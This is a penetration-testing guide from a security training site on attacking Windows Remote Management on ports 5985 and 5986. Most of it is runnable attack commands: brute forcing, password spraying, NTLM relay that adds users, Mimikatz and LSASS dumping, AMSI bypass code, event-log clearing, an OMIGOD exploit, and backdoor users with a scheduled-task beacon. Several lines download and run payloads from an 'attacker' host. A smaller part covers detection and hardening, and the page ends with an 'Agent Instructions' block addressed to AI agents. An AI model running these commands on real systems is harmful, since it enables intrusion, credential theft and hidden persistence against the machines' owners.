# WinRM - Port 5985, 5986 {% tabs %} {% tab title="Support VeryLazyTech 🎉" %} * Become VeryLazyTech [**member**](https://shop.verylazytech.com/)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚 {% endtab %} {% endtabs %} ## Basic info WinRM is essentially an HTTP-based interface for Windows Management Instrumentation (WMI), using SOAP to facilitate communication. Think of it as "SSH for Windows" - it allows administrators to execute commands and scripts remotely on Windows machines. #### Default Ports * **5985/tcp** - WinRM HTTP (unencrypted) * **5986/tcp** - WinRM HTTPS (encrypted with TLS) The presence of these open ports typically indicates that remote PowerShell access is configured and potentially accessible. #### Architecture When you connect via WinRM, the service creates a new process (`wsmprovhost.exe`) on the target system that handles your remote session. This process runs under the context of the authenticated user. ## Reconnaissance & Enumeration #### Port Scanning Start with identifying WinRM services using Nmap: ```bash # Basic scan nmap -p 5985,5986 -sV -sC # More detailed enumeration nmap -p 5985,5986 -sV -sC --script http-methods,http-auth # Scan entire subnet nmap -p 5985,5986 -sV /24 -oA winrm-scan ``` #### Banner Grabbing ```bash # Using netcat nc -nv 5985 # Using curl curl -v http://:5985/wsman # Check for HTTPS curl -k -v https://:5986/wsman ``` #### Windows-Based Testing If you're testing from a Windows machine, you can verify WinRM configuration: ```powershell # Test if WinRM is configured on target Test-WSMan # Test with credentials Test-WSMan -ComputerName -Credential (Get-Credential) -Authentication Negotiate # Check WinRM service status locally Get-Service WinRM winrm get winrm/config ``` Expected output from a properly configured target: ```xml wsmid : http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd ProtocolVersion : http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd ProductVendor : Microsoft Corporation ProductVersion : OS: 0.0.0 SP: 0.0 Stack: 3.0 ``` #### Shodan Queries Find WinRM services exposed on the internet: ``` port:5985 Microsoft-HTTPAPI port:5986 Microsoft-HTTPAPI ``` ## Authentication Methods WinRM supports multiple authentication methods: 1. **Kerberos** (default for domain-joined machines) 2. **NTLM** (fallback, works with local accounts) 3. **Basic** (username/password, requires HTTPS) 4. **Certificate** (client certificate authentication) 5. **CredSSP** (allows credential delegation) ### Credential-Based Attacks #### Username Enumeration Before brute-forcing, try to enumerate valid usernames: ```bash # Using kerbrute (if Kerberos is enabled) kerbrute userenum --dc -d users.txt # Using enum4linux enum4linux -U # Using CrackMapExec crackmapexec smb --users ``` #### Brute Force Attacks **Warning:** Be cautious with brute-forcing WinRM as it can lock out accounts. Always check the account lockout policy first. **Using CrackMapExec** ```bash # Single credential test crackmapexec winrm -u administrator -p 'Password123!' # Username list + password list crackmapexec winrm -u users.txt -p passwords.txt # Using NTLM hash crackmapexec winrm -u administrator -H # Check access without executing commands crackmapexec winrm -u administrator -p 'Password123!' --continue-on-success # Execute command upon success crackmapexec winrm -u administrator -p 'Password123!' -x 'whoami' # Execute PowerShell command crackmapexec winrm -u administrator -p 'Password123!' -X '$PSVersionTable' ``` **Using Hydra** ```bash # Single username hydra -l administrator -P passwords.txt winrm # Multiple usernames hydra -L users.txt -P passwords.txt winrm # Verbose output with 4 parallel tasks hydra -t 4 -V -l administrator -P passwords.txt winrm:// ``` **Using Metasploit** ```bash use auxiliary/scanner/winrm/winrm_login set RHOSTS set USER_FILE users.txt set PASS_FILE passwords.txt set STOP_ON_SUCCESS true run ``` ### Password Spraying Password spraying is safer than brute-forcing as it uses one password across many usernames: ```bash # Using CrackMapExec crackmapexec winrm /24 -u users.txt -p 'Winter2024!' --continue-on-success # Using spray (custom script) for user in $(cat users.txt); do crackmapexec winrm -u $user -p 'Password123!' | grep '+' done ``` ## Post-Authentication Exploitation #### Evil-WinRM (Primary Tool) Evil-WinRM is the go-to tool for WinRM exploitation. Install it: ```bash # Install gem install evil-winrm # Or use Docker docker pull oscarakaelvis/evil-winrm ``` **Basic Connection** ```bash # Username + Password evil-winrm -i -u administrator -p 'Password123!' # Username + Hash (Pass-the-Hash) evil-winrm -i -u administrator -H # Domain credentials evil-winrm -i -u 'domain\username' -p 'Password123!' # Use HTTPS (port 5986) evil-winrm -i -u administrator -p 'Password123!' -S # Custom port evil-winrm -i -u administrator -p 'Password123!' -P 5986 # Specify realm for Kerberos evil-winrm -i -u administrator -p 'Password123!' -r domain.local ``` ### **Advanced Evil-WinRM Features** #### **Kerberos Authentication (v3.x+)** ```bash # Using Kerberos ticket evil-winrm -i -u j.doe -k --spn HTTP/ # Request Kerberos ticket first kinit j.doe@DOMAIN.LOCAL evil-winrm -i dc01.domain.local -k ``` #### **Certificate-Based Authentication** ```bash evil-winrm -i --cert-pem cert.pem --key-pem key.pem ``` #### **File Operations** ```bash # Upload file (in evil-winrm session) upload /local/path/file.exe C:\Windows\Temp\file.exe # Download file download C:\Windows\Temp\loot.txt /local/path/loot.txt # Upload and execute upload /opt/mimikatz.exe C:\Windows\Temp\mimikatz.exe ./mimikatz.exe ``` #### **Script Execution** ```bash # Load PowerShell script in memory evil-winrm -i -u administrator -p 'Password123!' -s /opt/scripts/ # Then in the session: Invoke-Mimikatz.ps1 Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"' ``` #### **Binary Execution** ```bash # Load binary directory evil-winrm -i -u administrator -p 'Password123!' -e /opt/binaries/ # Then in the session: menu Invoke-Binary /opt/binaries/winPEAS.exe ``` #### **Session Logging** ```bash # Enable logging evil-winrm -i -u administrator -p 'Password123!' -L session.log ``` #### **Bypass AMSI** ```bash # Evil-WinRM automatically attempts AMSI bypass, but you can also: evil-winrm -i -u administrator -p 'Password123!' # Then manually: [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) ``` ## PowerShell-Based Connections ### **From Windows Systems** **Create Credential Object** ```powershell # Prompt for credentials $cred = Get-Credential # Or create programmatically $password = ConvertTo-SecureString 'Password123!' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential('administrator', $password) # Domain credentials $cred = New-Object System.Management.Automation.PSCredential('DOMAIN\username', $password) # Local account (note the .\ prefix) $cred = New-Object System.Management.Automation.PSCredential('.\localadmin', $password) ``` **Interactive Session** ```powershell # Enter remote session Enter-PSSession -ComputerName -Credential $cred # With different authentication Enter-PSSession -ComputerName -Credential $cred -Authentication Negotiate # Bypass proxy $sessionOption = New-PSSessionOption -ProxyAccessType NoProxyServer Enter-PSSession -ComputerName -Credential $cred -SessionOption $sessionOption # Exit session (but keep it in background) Exit-PSSession ``` **Persistent Sessions** ```powershell # Create persistent session $session = New-PSSession -ComputerName -Credential $cred # Re-enter session Enter-PSSession -Session $session # Use session for command execution Invoke-Command -Session $session -ScriptBlock { whoami } # Remove session when done Remove-PSSession -Session $session ``` **Execute Single Commands** ```powershell # Basic command Invoke-Command -ComputerName -Credential $cred -ScriptBlock { ipconfig /all } # With parameters Invoke-Command -ComputerName -Credential $cred -ScriptBlock { param($user) net user $user } -ArgumentList "testuser" # Execute local function remotely function Get-Info { hostname; whoami } Invoke-Command -ComputerName -Credential $cred -ScriptBlock ${function:Get-Info} ``` **Execute Scripts** ```powershell # Run local script on remote machine Invoke-Command -ComputerName -Credential $cred -FilePath C:\scripts\enum.ps1 # Load script into session $session = New-PSSession -ComputerName -Credential $cred Invoke-Command -Session $session -FilePath C:\scripts\PowerView.ps1 Invoke-Command -Session $session -ScriptBlock { Get-NetUser } ``` **Get Reverse Shell** ```powershell Invoke-Command -ComputerName -Credential $cred -ScriptBlock { IEX (New-Object Net.WebClient).DownloadString('http:///shell.ps1') } ``` ### **From Linux Systems** **Using pypsrp** ```bash # Install pip3 install pypsrp ``` ```python from psrp.client import Client # Create connection client = Client('target-ip', username='administrator', password='Password123!', ssl=False) # Execute command output, streams, had_errors = client.execute_cmd('ipconfig /all') print(output) # Execute PowerShell output, streams, had_errors = client.execute_ps('Get-Process | Select-Object -First 5') print(output) # Clean up client.close() ``` **Using winrm-rb (Ruby)** ```ruby require 'winrm' conn = WinRM::Connection.new( endpoint: 'http://target-ip:5985/wsman', user: 'administrator', password: 'Password123!' ) conn.shell(:powershell) do |shell| output = shell.run('Get-Process | Select-Object -First 5') puts output.stdout end ``` **Custom Ruby Script with Upload Capability** ```ruby require 'winrm-fs' conn = WinRM::Connection.new( endpoint: 'http://target-ip:5985/wsman', transport: :plaintext, user: 'administrator', password: 'Password123!', :no_ssl_peer_verification => true ) file_manager = WinRM::FS::FileManager.new(conn) # Upload file file_manager.upload('/local/file.txt', 'C:\Windows\Temp\file.txt') # Execute commands conn.shell(:powershell) do |shell| output = shell.run('type C:\Windows\Temp\file.txt') puts output.stdout end ``` **Using PowerShell Docker Container** ```bash docker run -it quickbreach/powershell-ntlm # Inside container $cred = Get-Credential Enter-PSSession -ComputerName -Authentication Negotiate -Credential $cred ``` ## NTLM Relay Attacks ### Direct Relay to WinRM (Updated 2023+) Since Impacket v0.11.0, you can relay NTLM authentication directly to WinRM: **Prerequisites:** * Target has HTTP WinRM enabled (port 5985) * SMB signing not required on the network * Valid user authentication coerced **Setup Attack** ```bash # Terminal 1: Start ntlmrelayx sudo ntlmrelayx.py -t wsman://10.0.0.25 --no-smb-server -smb2support \ --command "net user pwned P@ssw0rd! /add" # Terminal 2: Trigger authentication with Responder sudo responder -I eth0 -wrf # Or use mitm6 for IPv6 attack sudo mitm6 -d domain.local ``` **Advanced Relay Commands** ```bash # Execute PowerShell sudo ntlmrelayx.py -t wsman://10.0.0.25 -smb2support \ --command "powershell -ep bypass -c IEX(New-Object Net.WebClient).DownloadString('http://attacker/shell.ps1')" # Dump SAM sudo ntlmrelayx.py -t wsman://10.0.0.25 -smb2support \ --command "reg save HKLM\SAM C:\Windows\Temp\sam.hive" # Multiple targets sudo ntlmrelayx.py -tf targets.txt -smb2support ``` #### Mitigations * Disable HTTP listener: `Set-Item WSMan:\localhost\Service\EnableCompatibilityHttpListener -Value false` * Enable Extended Protection for Authentication (EPA) * Require SMB signing * Use HTTPS only for WinRM ## Privilege Escalation via WinRM ### Loading PowerShell Scripts ```powershell # PowerUp IEX (New-Object Net.WebClient).DownloadString('http://attacker/PowerUp.ps1') Invoke-AllChecks # Sherlock IEX (New-Object Net.WebClient).DownloadString('http://attacker/Sherlock.ps1') Find-AllVulns # winPEAS IEX (New-Object Net.WebClient).DownloadString('http://attacker/winPEASany.exe') ``` ### Credential Harvesting **Mimikatz via WinRM** ```powershell # Load in memory IEX (New-Object Net.WebClient).DownloadString('http://attacker/Invoke-Mimikatz.ps1') Invoke-Mimikatz -Command '"privilege::debug" "sekurlsa::logonpasswords"' # Or upload binary via evil-winrm upload /opt/mimikatz.exe C:\Windows\Temp\m.exe ./m.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" ``` **Dump LSASS** ```powershell # Using procdump .\procdump64.exe -accepteula -ma lsass.exe lsass.dmp # Download and parse offline download C:\Windows\Temp\lsass.dmp /local/path/lsass.dmp ``` **Dump SAM/SYSTEM** ```powershell reg save HKLM\SAM C:\Windows\Temp\sam.hive reg save HKLM\SYSTEM C:\Windows\Temp\system.hive download C:\Windows\Temp\sam.hive download C:\Windows\Temp\system.hive # Parse locally impacket-secretsdump -sam sam.hive -system system.hive LOCAL ``` ## Advanced Techniques ### Constrained Language Mode Bypass If PowerShell is in Constrained Language Mode: ```powershell # Check current mode $ExecutionContext.SessionState.LanguageMode # Bypass using WSMan COM object $ws = New-Object -ComObject WSMan.Automation $session = $ws.CreateSession('http://localhost:5985/wsman', 0, $null) $cmdId = $session.Command('cmd.exe', @('/c', 'whoami')) $session.Signal($cmdId, 0) ``` ### Certificate-Based Authentication Exploitation If certificate authentication is enabled: ```bash # Generate certificate request openssl req -newkey rsa:2048 -nodes -keyout client.key -out client.csr # After getting signed cert evil-winrm -i --cert-pem client.pem --key-pem client.key ``` ### WinRM + CredSSP for Double-Hop CredSSP allows credential delegation (double-hop): ```powershell # Enable CredSSP on attacker machine Enable-WSManCredSSP -Role Client -DelegateComputer * # Connect with CredSSP $cred = Get-Credential Enter-PSSession -ComputerName target1 -Credential $cred -Authentication CredSSP # Now you can access other machines Enter-PSSession -ComputerName target2 -Credential $cred ``` ### Forcing WinRM Remotely If WinRM isn't enabled but you have credentials: ```bash # Using PsExec psexec.py domain/user:password@target-ip "powershell -c Enable-PSRemoting -Force" # Using wmic (from Windows) wmic /node:target-ip /user:administrator /password:Password123! process call create "powershell Enable-PSRemoting -Force" # Using Impacket atexec.py domain/user:password@target-ip 'powershell -c "Enable-PSRemoting -Force"' ``` ### Cloud-Specific: Azure OMI Exploitation #### OMIGOD (CVE-2021-38647) Azure Linux VMs use OMI (Open Management Infrastructure) which exposes WS-MAN on ports 5985/5986: **Exploitation** ```bash # Unauthenticated RCE curl -X POST http://target:5985/wsman \ -H "Content-Type: application/soap+xml;charset=UTF-8" \ -d ' HTTP://target:5985/wsman http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem/ExecuteShellCommand whoami ' ``` **Mitigation:** * Update OMI to version ≥ 1.6.8-1 * Block ports 5985/5986 from the internet * Use Azure NSG to restrict access ## Lateral Movement #### One-Liner Lateral Movement ```powershell # Execute command on multiple machines $targets = @('server1', 'server2', 'server3') $cred = Get-Credential foreach ($target in $targets) { Invoke-Command -ComputerName $target -Credential $cred -ScriptBlock { whoami } } # Deploy implant $targets = Get-Content targets.txt foreach ($target in $targets) { Invoke-Command -ComputerName $target -Credential $cred -ScriptBlock { IEX (New-Object Net.WebClient).DownloadString('http://attacker/agent.ps1') } } ``` #### Using CrackMapExec for Spray ```bash # Execute on all accessible hosts crackmapexec winrm targets.txt -u administrator -H -x "whoami" --continue-on-success # Deploy beacon crackmapexec winrm targets.txt -u administrator -p 'Password123!' -X 'IEX (New-Object Net.WebClient).DownloadString("http://attacker/beacon.ps1")' ``` ## Defense Evasion #### AMSI Bypass ```powershell # Method 1: Reflection [Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) # Method 2: Patch $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1) ``` #### Logging Evasion ```powershell # Disable PowerShell logging Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 0 # Clear event logs wevtutil cl "Windows PowerShell" wevtutil cl "Microsoft-Windows-PowerShell/Operational" wevtutil cl "Microsoft-Windows-WinRM/Operational" ``` #### Obfuscation ```powershell # Base64 encode commands $command = 'whoami' $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encoded = [Convert]::ToBase64String($bytes) powershell -encodedCommand $encoded # Use Invoke-Obfuscation Import-Module Invoke-Obfuscation.ps1 Invoke-Obfuscation ``` ## Detection & Defense #### Enable Logging **PowerShell Script Block Logging** ```powershell # Enable via Group Policy or Registry New-Item -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Force Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" -Name "EnableScriptBlockLogging" -Value 1 ``` **WinRM Operational Logging** ```powershell wevtutil sl "Microsoft-Windows-WinRM/Operational" /e:true ``` **Important Event IDs:** * Event 91/163: Shell created * Event 182: Authentication failure * Event 4262 (Security log): Records source IP (added July 2022) #### Monitor for Suspicious Activity ```powershell # Check active WinRM sessions Get-PSSession # Check WinRM event logs Get-WinEvent -LogName "Microsoft-Windows-WinRM/Operational" -MaxEvents 50 # Find suspicious PowerShell execution Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-PowerShell/Operational'; ID=4104} | Where-Object { $_.Message -match 'mimikatz|invoke-|downloadstring' } ``` #### Hardening WinRM ```powershell # Disable HTTP, use HTTPS only Disable-PSRemoting -Force winrm delete winrm/config/listener?Address=*+Transport=HTTP # Configure HTTPS listener $cert = New-SelfSignedCertificate -DnsName "servername" -CertStoreLocation "Cert:\LocalMachine\My" New-Item -Path WSMan:\localhost\Listener -Transport HTTPS -Address * -CertificateThumbprint $cert.Thumbprint -Force # Restrict allowed IPs Set-Item WSMan:\localhost\Client\TrustedHosts -Value "192.168.1.100,192.168.1.101" # Enable Extended Protection for Authentication (EPA) Set-Item WSMan:\localhost\Service\Auth\CbtHardeningLevel -Value Strict # Require Kerberos only Set-Item WSMan:\localhost\Service\Auth\Kerberos -Value $true Set-Item WSMan:\localhost\Service\Auth\Negotiate -Value $false Set-Item WSMan:\localhost\Service\Auth\Basic -Value $false ``` #### Network Segmentation * Restrict WinRM access to management VLANs only * Use host-based firewall rules: ```powershell # Allow only from specific IPs New-NetFirewallRule -DisplayName "WinRM-HTTP-Restricted" -Direction Inbound -Protocol TCP -LocalPort 5985 -RemoteAddress 192.168.1.0/24 -Action Allow ``` ## Common Issues & Troubleshooting #### Connection Errors **Error: "The WinRM client cannot process the request"** ```powershell # On attacking machine, add target to trusted hosts winrm set winrm/config/client '@{TrustedHosts="target-ip"}' # Or use wildcard (less secure) Set-Item WSMan:\localhost\Client\TrustedHosts -Value "*" -Force ``` **Error: "Access is denied"** * Verify credentials are correct * Check if user is in "Remote Management Users" group * Verify firewall isn't blocking connection **Error: "Connection refused"** * WinRM service not running: `Start-Service WinRM` * Firewall blocking: `Enable-PSRemoting -Force` * Listener not configured: Check with `winrm enumerate winrm/config/listener` #### IPv6 Connections with Evil-WinRM ```bash # Add to /etc/hosts echo "dead:beef::1 target.local" >> /etc/hosts # Connect using hostname evil-winrm -i target.local -u administrator -p 'Password123!' ``` ## Practical Attack Scenarios #### Scenario 1: Internal Penetration Test **Goal:** Gain access to domain controller via WinRM ```bash # 1. Discover WinRM hosts nmap -p 5985,5986 -sV 192.168.1.0/24 -oG winrm-hosts.txt # 2. Enumerate users via SMB crackmapexec smb 192.168.1.0/24 --users > users.txt # 3. Password spray crackmapexec winrm 192.168.1.0/24 -u users.txt -p 'Winter2024!' --continue-on-success # 4. Connect to compromised host evil-winrm -i 192.168.1.50 -u j.doe -p 'Winter2024!' # 5. Enumerate domain upload /opt/PowerView.ps1 Import-Module ./PowerView.ps1 Get-DomainController Find-LocalAdminAccess # 6. Lateral movement to DC $cred = Get-Credential Enter-PSSession -ComputerName DC01 -Credential $cred ``` #### Scenario 2: Post-Exploitation **Goal:** Establish persistence and exfiltrate data ```powershell # 1. Create backdoor user net user backdoor P@ssw0rd! /add net localgroup administrators backdoor /add net localgroup "Remote Management Users" backdoor /add # 2. Dump credentials upload /opt/mimikatz.exe ./mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" > creds.txt download C:\Windows\Temp\creds.txt # 3. Search for sensitive files Get-ChildItem -Path C:\ -Include *.xlsx,*.docx,*password*,*confidential* -Recurse -ErrorAction SilentlyContinue # 4. Exfiltrate data Compress-Archive -Path C:\Sensitive\* -DestinationPath C:\Windows\Temp\loot.zip download C:\Windows\Temp\loot.zip # 5. Establish persistence $trigger = New-ScheduledTaskTrigger -AtStartup $action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-ep bypass -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://attacker/beacon.ps1')" Register-ScheduledTask -TaskName "WindowsUpdate" -Trigger $trigger -Action $action -RunLevel Highest ``` #### Scenario 3: NTLM Relay Chain **Goal:** Relay from compromised workstation to sensitive servers ```bash # 1. Compromise workstation via phishing # 2. Setup relay on compromised host upload /opt/ntlmrelayx.py python ntlmrelayx.py -t wsman://10.0.0.50 -smb2support # 3. Trigger authentication from other users # (via various methods - printer bug, forced auth, etc.) # 4. Execute on relayed session # Commands defined in ntlmrelayx configuration ``` ### Tool Reference #### Must-Have Tools 1. **Evil-WinRM** - Primary WinRM exploitation tool 2. **CrackMapExec** - Network enumeration and exploitation 3. **Impacket** - NTLM relay and remote execution 4. **PowerView** - Domain enumeration 5. **Mimikatz** - Credential dumping 6. **Rubeus** - Kerberos exploitation #### Installation Commands ```bash # Evil-WinRM gem install evil-winrm # CrackMapExec pipx install crackmapexec # Impacket git clone https://github.com/fortra/impacket.git cd impacket pip install . # Or use via Docker docker pull byt3bl33d3r/crackmapexec ``` ### Cheat Sheet #### Quick Reference Commands ```bash # Enumeration nmap -p 5985,5986 -sV crackmapexec winrm -u '' -p '' # Authentication Testing crackmapexec winrm -u admin -p 'password' crackmapexec winrm -u admin -H # Connection evil-winrm -i -u admin -p 'password' evil-winrm -i -u admin -H # File Operations upload /local/file C:\remote\file download C:\remote\file /local/file # PowerShell Session $cred = Get-Credential Enter-PSSession -ComputerName -Credential $cred Invoke-Command -ComputerName -Credential $cred -ScriptBlock { whoami } # NTLM Relay ntlmrelayx.py -t wsman:// -smb2support --command "cmd" # Lateral Movement crackmapexec winrm targets.txt -u admin -p 'password' -x "whoami" ``` ### Conclusion WinRM presents a significant attack surface when misconfigured or left accessible. As a penetration tester, understanding how to enumerate, exploit, and move laterally through WinRM services is critical for modern Windows environment assessments. **Key Takeaways:** 1. Always check for WinRM during network reconnaissance 2. Password spraying is safer than brute-forcing 3. Evil-WinRM is your primary tool for exploitation 4. NTLM relay attacks can bypass credentials entirely 5. Proper logging and monitoring are essential for defense 6. Disable HTTP listeners and use HTTPS with EPA 7. Restrict WinRM access to management networks only Remember to always conduct these techniques within the scope of authorized penetration testing engagements. Unauthorized access to systems is illegal. ### Additional Resources * [HackTricks WinRM](https://book.hacktricks.wiki/en/network-services-pentesting/5985-5986-pentesting-winrm.html) * [Microsoft WinRM Documentation](https://docs.microsoft.com/en-us/windows/win32/winrm/portal) * [Evil-WinRM GitHub](https://github.com/Hackplayers/evil-winrm) * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) * [Impacket Examples](https://github.com/fortra/impacket/tree/master/examples) {% hint style="success" %} Learn & practice [**For the Bug Bounty**](https://shop.verylazytech.com/)
Support VeryLazyTech 🎉 * Become VeryLazyTech [**member**](https://shop.verylazytech.com/)**! 🎁** * **Follow** us on: * **✖ Twitter** [**@VeryLazyTech**](https://x.com/verylazytech)**.** * **👾 Github** [**@VeryLazyTech**](https://github.com/verylazytech)**.** * **📜 Medium** [**@VeryLazyTech**](https://medium.com/@verylazytech)**.** * **📺 YouTube** [**@VeryLazyTech**](https://www.youtube.com/@VeryLazyTechOfficial)**.** * **📩 Telegram** [**@VeryLazyTech**](https://t.me/+mSGyb008VL40MmVk)**.** * **🕵️‍♂️ My Site** [**@VeryLazyTech**](https://www.verylazytech.com/)**.** * Visit our [**shop** ](https://shop.verylazytech.com/)for e-books and courses. 📚
{% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://www.verylazytech.com/winrm-port-5985-5986.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.